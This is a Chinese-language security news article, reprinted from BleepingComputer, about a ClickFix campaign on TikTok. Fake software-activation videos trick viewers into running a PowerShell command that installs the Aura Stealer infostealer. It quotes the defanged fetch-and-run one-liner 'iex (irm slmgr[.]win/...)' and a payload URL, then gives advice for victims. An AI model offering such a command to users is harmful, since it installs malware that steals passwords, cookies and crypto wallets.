資安研究人員發現網路犯罪集團正利用 TikTok 短影片平台發動新一波 ClickFix 社交工程攻擊,透過偽裝成熱門軟體免費啟用教學的影片,誘騙用戶執行惡意 PowerShell 指令,進而在受害電腦植入 Aura Stealer 資訊竊取惡意程式。這種將複雜攻擊簡化為「一行指令」的手法,大幅降低用戶戒心,已對全球用戶構成重大威脅。
SANS 資安研究員 Xavier Mertens 發現此攻擊活動仍在持續進行中,手法與趨勢科技 (Trend Micro) 今年 5 月觀察到的攻擊模式大致相同,顯示此攻擊手法已運作數月且仍在演進。
偽裝軟體破解教學 實為精心設計陷阱
攻擊者在 TikTok 上發布的影片聲稱提供 Windows、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro、Discord Nitro 等正版軟體的免費啟用方法,甚至包括 Netflix 和 Spotify Premium 等訂閱服務的破解教學。這些都是用戶最常尋找破解版本的熱門軟體,攻擊者精準掌握了目標受眾的需求。
每支影片都會顯示一行看似簡單的指令,並指示觀看者以系統管理員權限在 PowerShell 中執行。典型的惡意指令格式為:
iex (irm slmgr[.]win/photoshop)
值得注意的是,網址中的程式名稱會根據偽裝的軟體而變化。例如在偽造的 Windows 啟用影片中,網址會包含 "windows" 而非 "photoshop"。
ClickFix 攻擊:社交工程的精密演化
ClickFix 是一種社交工程技術,提供看似合法的「修復方法」或操作指引,實際上是誘騙用戶執行惡意 PowerShell 指令或其他腳本,進而感染電腦。這種攻擊手法的危險之處在於它利用了用戶的信任心理,將複雜的惡意程式植入過程偽裝成簡單的解決方案。
當用戶執行上述指令時,PowerShell 會連線到遠端網站 slmgr[.]win,下載並執行另一個 PowerShell 腳本。這個腳本接著從 Cloudflare Pages 下載兩個執行檔,利用CDN服務來規避資安軟體的偵測。
Aura Stealer 變種:全方位竊取用戶資料
第一個下載的執行檔來自 https://file-epq[.]pages[.]dev/updater.exe,經分析確認是 Aura Stealer 資訊竊取惡意程式的變種。Aura Stealer 是一種功能完整的資訊竊取工具,能夠收集:
- 瀏覽器儲存的帳號密碼
- 身份驗證 Cookie
- 加密貨幣錢包資訊
- 其他應用程式的登入憑證
所有竊取的資料都會上傳到攻擊者控制的伺服器,讓他們能夠存取受害者的各種帳戶。
Mertens 的分析還發現,攻擊者會下載名為 source.exe 的額外惡意載荷,這個程式使用 .NET 內建的 Visual C# 編譯器 (csc.exe) 自行編譯程式碼,然後將編譯後的程式碼注入記憶體並執行。
這種技術稱為「無檔案攻擊(Fileless Attack)」,能夠規避傳統防毒軟體的偵測。目前這個額外酬載的確切用途尚不明確,可能是為了建立持續性後門或執行其他惡意行為。
雲端服務成為攻擊跳板
這起攻擊特別值得關注的是對 Cloudflare Pages 等合法雲端服務的濫用。攻擊者利用這些信譽良好的平台託管惡意程式,因為許多企業防火牆和資安產品不會封鎖來自這些網域的流量。這種「寄生式」(Living off the Land) 策略讓攻擊更難被偵測和阻擋。
外媒報導,這些惡意影片在 TikTok 上持續出現,儘管平台有內容審查機制,但攻擊者不斷創建新帳號和影片。短影片的病毒式傳播特性讓這種攻擊能夠快速觸及大量潛在受害者,特別是年輕用戶和對資安意識較低的一般使用者。
ClickFix 攻擊在過去一年變得極為流行,被用於散布各種惡意程式,包括勒索軟體和加密貨幣竊取程式。這種攻擊手法的成功率高,因為它不需要利用軟體漏洞,而是利用人性的弱點。
立即防護措施與建議
資安專家強烈建議,任何執行過類似指令的用戶都應將所有帳號密碼視為已遭洩露,必須立即:
- 重設所有網站密碼:優先處理金融服務、電子郵件、社群媒體等重要帳戶
- 啟用雙因素驗證 (Two-Factor Authentication, 2FA):為所有支援的服務啟用額外驗證層
- 檢查瀏覽器儲存的密碼:清除並重新設定所有自動儲存的登入資訊
- 監控金融帳戶:密切注意信用卡和銀行帳戶的異常活動
- 掃描電腦:使用信譽良好的防毒軟體進行完整系統掃描
資安專家一再強調,用戶絕對不應該複製網路上的文字並在作業系統對話框中執行,包括檔案總管網址列、命令提示字元、PowerShell、macOS 終端機和 Linux Shell。這是基本的資安守則,任何要求執行命令列指令的教學都應該被視為高度可疑。
正版軟體廠商絕不會透過社群媒體影片提供這種啟用方式。合法的軟體啟用都有官方管道和標準程序,不要執行來路不明的指令。
本文轉載自bleepingcomputer。